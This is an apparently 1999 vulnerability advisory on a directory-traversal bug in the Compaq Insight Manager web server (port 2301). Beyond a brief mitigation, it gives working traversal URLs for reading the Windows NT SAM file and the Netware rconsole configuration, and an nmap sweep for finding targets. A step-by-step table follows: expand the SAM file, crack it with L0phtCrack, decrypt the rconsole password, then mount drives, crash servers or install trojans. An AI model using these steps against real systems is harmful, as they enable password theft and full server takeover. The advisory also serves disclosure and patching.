Security Issue: Exploiting Compaq Insight Manager to Gain Administrator Access |
Time from thought to exploit: 4 hours
Risk Classification: High (gain
administrator/rconsole access capability)
Effort to Exploit: Easy
Effort to Mitigate: Medium/Easy
Sphere of vulnerability: Any network-attached device that can access port
2301
Infosec Security Vulnerability Report
No: Infosec.19990526.compaq-im.a
=====================================Vulnerability Summary
---------------------Problem: The web server included in Compaq Insight
Manager could expose sensitive information.Threat: Anyone that have access to port 2301 where
Compaq Insight Manager is installed could get
unrestricted access to the servers disk through
the "root dot dot" bug.Platform: Detected on Windows NT and Novell Netware servers
running on Compaq hardware.Solution: Disable the Compaq Insight Manager web server or
restrict anonymous access.
Vulnerability Description
-------------------------
When installing Compaq Insight Manager a web server gets installed. This web
server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This
bug gives unrestricted access to the vulnerable server's disk. It could easily
get exploited with one of the URLs:http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf(How many dots there should be is install-dependent)
Solution
--------
You could probably fix the problem by restricting anonymous access to the Compaq
Insight Manager web server. If you are not using the web server, Infosec
recommends disabling the service.
nmap -p 2301 (Address)/16
Compaq Insight Manager Version |
Status |
Compaq HTTP Server 1.2.14 | Vulnerable |
Compaq HTTP Server 1.2.15 (pre-release) | Vulnerable |
Compaq HTTP Server 1.3.12 | Vulnerable |
Compaq HTTP Server 1.4.10 | Vulnerable |
Compaq HTTP Server 1.5.3 | OK |
Compaq HTTP Server 2.0.8 | OK |
Microsoft Windows NT |
Novell Netware |
Using the correct URL, do a File -> Save Target As in Internet Explorer to save the sam._ file from the server to the local PC. | Using the correct URL, do a File -> Save Target As in Internet Explorer to save the ldremote.ncf file from the server to the local PC. |
Uncompress the file by using the expand
command.
expand sam._ sam.server |
Find the Remote.NLM password decryption tool at PacketStorm. Run REMOTE.EXE with the encrypted password string as the argument to decrypt the rconsole password immediately. |
Using L0phtCrack, load the SAM file and start cracking. Find approximately 25% immediately. Let run overnight to get most/all passwords. | Exploit the password by... |
Exploit the passwords found by mounting the server's drive, reading files, crashing the server, installing Trojan Horses/viruses |